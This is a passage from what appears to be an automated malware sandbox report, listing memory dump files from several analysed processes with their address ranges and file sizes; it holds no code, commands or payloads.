                                                                                                                                                                                                                                                  • memory/412-618-0x0000000140000000-0x0000000140AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    10.6MB

                                                                                                                                                                                                                                                  • memory/412-764-0x0000000140000000-0x0000000140AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    10.6MB

                                                                                                                                                                                                                                                  • memory/412-616-0x0000000140000000-0x0000000140AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    10.6MB

                                                                                                                                                                                                                                                  • memory/412-614-0x0000000140000000-0x0000000140AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    10.6MB

                                                                                                                                                                                                                                                  • memory/808-61-0x00000000732F0000-0x0000000073AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/808-47-0x0000000000F70000-0x0000000000FC2000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                                  • memory/808-48-0x00000000732F0000-0x0000000073AA0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/808-55-0x0000000003470000-0x0000000005470000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    32.0MB

                                                                                                                                                                                                                                                  • memory/1076-724-0x0000000000400000-0x0000000004427000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64.2MB

                                                                                                                                                                                                                                                  • memory/1076-797-0x0000000000400000-0x0000000004427000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64.2MB

                                                                                                                                                                                                                                                  • memory/1632-644-0x0000000010000000-0x0000000013BC3000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    59.8MB

                                                                                                                                                                                                                                                  • memory/1908-9-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-3-0x0000000005130000-0x0000000005131000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-6-0x0000000005160000-0x0000000005161000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-5-0x0000000005120000-0x0000000005121000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-7-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-4-0x0000000005140000-0x0000000005141000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-8-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-10-0x0000000005180000-0x0000000005181000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/1908-1-0x00000000776E4000-0x00000000776E6000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                  • memory/1908-0-0x0000000000D30000-0x00000000011FD000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/1908-15-0x0000000000D30000-0x00000000011FD000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/1908-2-0x0000000000D30000-0x00000000011FD000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/2008-270-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                  • memory/2008-266-0x0000000000400000-0x000000000063B000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.2MB

                                                                                                                                                                                                                                                  • memory/2008-335-0x0000000061E00000-0x0000000061EF3000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    972KB

                                                                                                                                                                                                                                                  • memory/2252-156-0x0000000006380000-0x000000000648A000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                  • memory/2252-159-0x0000000006320000-0x000000000635C000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                  • memory/2252-217-0x0000000072FB0000-0x0000000073760000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/2252-105-0x0000000000260000-0x00000000002B2000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    328KB

                                                                                                                                                                                                                                                  • memory/2252-107-0x0000000005060000-0x0000000005604000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    5.6MB

                                                                                                                                                                                                                                                  • memory/2252-108-0x0000000004B90000-0x0000000004C22000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    584KB

                                                                                                                                                                                                                                                  • memory/2252-110-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/2252-106-0x0000000072FB0000-0x0000000073760000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/2252-160-0x0000000006490000-0x00000000064DC000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/2252-140-0x0000000005810000-0x0000000005886000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                  • memory/2252-158-0x00000000062C0000-0x00000000062D2000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                  • memory/2252-111-0x0000000004C30000-0x0000000004C3A000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                  • memory/2252-154-0x0000000006830000-0x0000000006E48000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    6.1MB

                                                                                                                                                                                                                                                  • memory/2252-148-0x0000000005FB0000-0x0000000005FCE000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                  • memory/2384-149-0x0000000000400000-0x000000000044E000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    312KB

                                                                                                                                                                                                                                                  • memory/2384-155-0x0000000000400000-0x000000000044E000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    312KB

                                                                                                                                                                                                                                                  • memory/2384-157-0x0000000000400000-0x000000000044E000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    312KB

                                                                                                                                                                                                                                                  • memory/2700-743-0x0000000000400000-0x0000000004427000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64.2MB

                                                                                                                                                                                                                                                  • memory/2700-796-0x0000000000400000-0x0000000004427000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64.2MB

                                                                                                                                                                                                                                                  • memory/3152-58-0x0000000000E20000-0x0000000000E52000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                  • memory/3152-60-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/3152-59-0x0000000000E20000-0x0000000000E52000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                  • memory/3152-57-0x0000000000E20000-0x0000000000E52000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                  • memory/3152-56-0x0000000000E20000-0x0000000000E52000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                  • memory/3152-54-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/3152-51-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/3320-113-0x00007FF94E6B0000-0x00007FF94F171000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    10.8MB

                                                                                                                                                                                                                                                  • memory/3320-112-0x0000000000FB0000-0x0000000001070000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    768KB

                                                                                                                                                                                                                                                  • memory/3320-259-0x000000001E720000-0x000000001E796000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    472KB

                                                                                                                                                                                                                                                  • memory/3320-128-0x000000001BD00000-0x000000001BD10000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/3320-189-0x000000001BD00000-0x000000001BD10000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/3320-199-0x000000001E390000-0x000000001E49A000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                                                                  • memory/3320-200-0x000000001CB20000-0x000000001CB32000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    72KB

                                                                                                                                                                                                                                                  • memory/3320-201-0x000000001CD90000-0x000000001CDCC000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    240KB

                                                                                                                                                                                                                                                  • memory/3320-213-0x000000001BD00000-0x000000001BD10000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/3384-81-0x0000000000CC0000-0x0000000000F78000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.7MB

                                                                                                                                                                                                                                                  • memory/3560-762-0x0000000000400000-0x0000000004067000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    60.4MB

                                                                                                                                                                                                                                                  • memory/3560-956-0x0000000000400000-0x0000000004067000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    60.4MB

                                                                                                                                                                                                                                                  • memory/3940-79-0x0000000000400000-0x0000000000592000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.6MB

                                                                                                                                                                                                                                                  • memory/3940-216-0x0000000005850000-0x0000000005860000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/3940-215-0x0000000072FB0000-0x0000000073760000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/3940-84-0x0000000072FB0000-0x0000000073760000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    7.7MB

                                                                                                                                                                                                                                                  • memory/3940-85-0x0000000005850000-0x0000000005860000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64KB

                                                                                                                                                                                                                                                  • memory/4448-425-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                  • memory/4544-881-0x0000000000400000-0x0000000000C2C000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    8.2MB

                                                                                                                                                                                                                                                  • memory/4544-957-0x00007FF96DFF0000-0x00007FF96E1E5000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                  • memory/4544-951-0x000000006EA90000-0x000000006EC0B000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                                                                  • memory/4728-150-0x00000000001B0000-0x0000000000224000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    464KB

                                                                                                                                                                                                                                                  • memory/5020-24-0x00000000049B0000-0x00000000049B1000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-23-0x0000000004A10000-0x0000000004A11000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-78-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-27-0x0000000004A30000-0x0000000004A31000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-26-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-648-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-799-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-880-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-25-0x00000000049C0000-0x00000000049C1000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-80-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-18-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-417-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-20-0x00000000049E0000-0x00000000049E1000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-19-0x0000000000E50000-0x000000000131D000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4.8MB

                                                                                                                                                                                                                                                  • memory/5020-21-0x00000000049F0000-0x00000000049F1000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5020-22-0x00000000049D0000-0x00000000049D1000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    4KB

                                                                                                                                                                                                                                                  • memory/5032-974-0x00007FF96DFF0000-0x00007FF96E1E5000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    2.0MB

                                                                                                                                                                                                                                                  • memory/5032-972-0x000000006EA90000-0x000000006EC0B000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    1.5MB

                                                                                                                                                                                                                                                  • memory/5384-723-0x0000000000400000-0x0000000004044000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    60.3MB

                                                                                                                                                                                                                                                  • memory/6004-968-0x0000000000400000-0x0000000004427000-memory.dmp
                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    64.2MB